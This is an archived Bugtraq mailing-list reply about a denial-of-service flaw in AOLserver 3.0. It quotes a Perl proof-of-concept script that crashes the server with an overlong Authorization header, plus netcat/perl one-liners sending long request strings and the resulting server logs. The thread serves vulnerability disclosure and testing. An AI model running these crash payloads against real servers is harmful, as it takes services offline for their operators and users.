Re: AOLserver 3.0 vulnerability

From: KF (dotslash@snosoft.com)
Date: 08/23/01 

Message-ID: <3B84644F.809B0F2E@snosoft.com>
Date: Wed, 22 Aug 2001 22:02:55 -0400
From: KF <dotslash@snosoft.com>
To: Nate Haggard <nate@securitylogics.com>, bugtraq@securityfocus.com
Subject: Re: AOLserver 3.0 vulnerability

Today I downloaded aolserver-3.0.tar.gz ... here are my test results.

 echo "GET /`perl -e 'print "A" x 2348'`" HTTP/1.0\r\n\
r\n" | nc localhost 8000

[22/Aug/2001:21:57:00][12425.5124][-conn2-] Error: nsd.fastpath:
stat(/tmp/aolserver/servers/server1/pages/ HTTP/1.0\nAuthorization:
Basic
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
...) failed: File name too long

 echo "GET /"`perl -e 'print "A" x 2348'`" HTTP/1.0\r\n
\r\n" | nc localhost 8000

[22/Aug/2001:22:00:06][12425.6148][-conn3-] Error: nsd.fastpath:
stat(/tmp/aolserver/servers/server1/pages/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
...) failed: File name too long

-KF

Nate Haggard wrote:
>
> Aolserver 3.0 will crash when it is given a long authorization string. It
> is also possible this vulnerability will allow a hacker to execute
> arbitrary code through a buffer overflow. I have not verified a buffer
> overflow exists. Aolserver 3.4 and 3.3.1 are not vulnerable to this attack.
>
> Here is a sample exploit:
> ------------------------------------------
> #!/usr/bin/perl
> use IO::Socket;
> unless (@ARGV == 1) { die "usage: $0 host ..." }
> $host = shift(@ARGV);
> $remote = IO::Socket::INET->new( Proto => "tcp",
> PeerAddr => $host,
> PeerPort => "http(80)",
> );
> unless ($remote) { die "cannot connect to http daemon on $host" }
>
> $junk = "X" x 2048;
> $killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n";
> $remote->autoflush(1);
> print $remote $killme;
> close $remote;
>
> --------------------
> Nate Haggard
> SecurityLogics.com

Relevant Pages

  • [EXPL] AOLserver Vulnerable To Host Buffer Overflow
    ... AOLserver Vulnerable To Host Buffer Overflow ... A vulnerability in the ... product allows remote users to overflow an internal buffer used by the ...
    (Securiteam)
  • AOLserver 3.0 vulnerability
    ... Aolserver 3.0 will crash when it is given a long authorization string. ... is also possible this vulnerability will allow a hacker to execute ... arbitrary code through a buffer overflow. ... print $remote $killme; ...
    (Bugtraq)
  • [UNIX] AOLserver DB Proxy Daemon Format String Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... AOLserver also includes complete database integration and a dynamic page ... vulnerability in the AOLserver external database driver proxy daemon API ...
    (Securiteam)
  • AOLserver 3.4.2 Unauthorized File Disclosure Vulnerability
    ... AOLserver 3.4.2 Unauthorized File Disclosure Vulnerability ... AOLserver is America Online's Open-Source web server. ...
    (NT-Bugtraq)